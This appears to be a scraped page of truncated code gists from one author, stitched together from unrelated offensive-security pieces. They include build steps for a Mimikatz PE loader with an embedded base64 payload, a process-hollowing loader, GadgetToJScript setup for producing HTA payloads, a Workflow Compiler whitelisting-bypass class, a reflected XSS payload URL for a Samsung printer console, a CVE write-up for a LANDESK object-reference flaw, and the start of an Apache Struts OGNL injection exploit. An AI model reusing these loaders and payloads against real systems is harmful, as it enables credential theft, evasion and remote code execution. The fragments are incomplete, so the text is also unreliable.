med0x2e

 1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases 
 
 2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a
 
 3. use @pljoel katz.cs cs file and uncomment the building lines available on Delivery.Program.Main() & comment Exec() line of code.
 
 4. Build it to generate file.b64, copy its content and replace Package.file string available on payload.txt file.
 
 6. Make sure payloadPath var is properly set on "TestAssemblyLoader.cs"
 

med0x2e

using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Text;

namespace Hollowing
{
    public class Loader
    {
        public static byte[] target_ = Encoding.ASCII.GetBytes("calc.exe");

med0x2e

Steps:

1- apt-get install mono-complete     
2- apt-get install wine winetricks -y
3- winetricks dotnet35  
4- winetricks dotnet48 
5- dpkg --add-architecture i386 && apt-get update && apt-get install wine32
6- rm -Rf ~/.wine
7- WINEPREFIX=~/.wine32 WINEARCH=win32 wineboot
8- wine GadgetToJScript.NET3.5.exe -r -c helloworld.cs -d System.Windows.Forms.dll -w hta -o hello

med0x2e

using System;
using System.IO;
using System.IO.Compression;
using System.Runtime.InteropServices;
using System.Security.Cryptography;
using System.Workflow.Activities;

public class KatzWFCompiler : SequentialWorkflowActivity
{
    public KatzWFCompiler()

med0x2e

[Suggested description]
Samsung printer model "SCX-824" web console is vulnerable to
a reflected Cross-Site-Scripting (XSS) vulnerability which can be
triggered by using "print from file" feature which forward the
user to the following URL:

"http://<PRINTER_IP>/sws/swsAlert.sws?popupid=successMsg&type=alert&bullet=suc&func=&Nfunc=closePopup("successMsg","","")&flag=&frame=&msg="/><script>alert('XSS');</script>

The vulnerable parameter "msg" is not properly encoded before interepred as HTML/JS.
------------------------------------------

med0x2e

<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"   
	>
</registration>

med0x2e

<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
  <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
    <d2p1:string>result.xml</d2p1:string>
  </files>
  <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
    <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler">
      <d3p1:anyType xmlns:d4p1="http://www.w3.org/2001/XMLSchema" i:type="d4p1:string">C:\Windows\Microsoft.NET\Framework\v4.0.30319\System.IO.Compression.dll</d3p1:anyType>
    </assemblyNames>
    <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />

med0x2e

[Suggested description]
In LANDESK Management Suite 2016.4 and 2017.x, an Unrestricted
Direct Object Reference leads to referencing/updating objects
belonging to other users. In other words, a normal user
can send requests to a specific URI with the
target user's username in an HTTP payload in order to retrieve a
key/token and use it to access/update objects belonging to other
users. Such objects could be user profiles, tickets, incidents, etc.
------------------------------------------
[Additional Information]

med0x2e

import urllib2
import httplib
 
 
def exploit(url, cmd):
    payload = "%{(#_='multipart/form-data')."
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?"
    payload += "(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."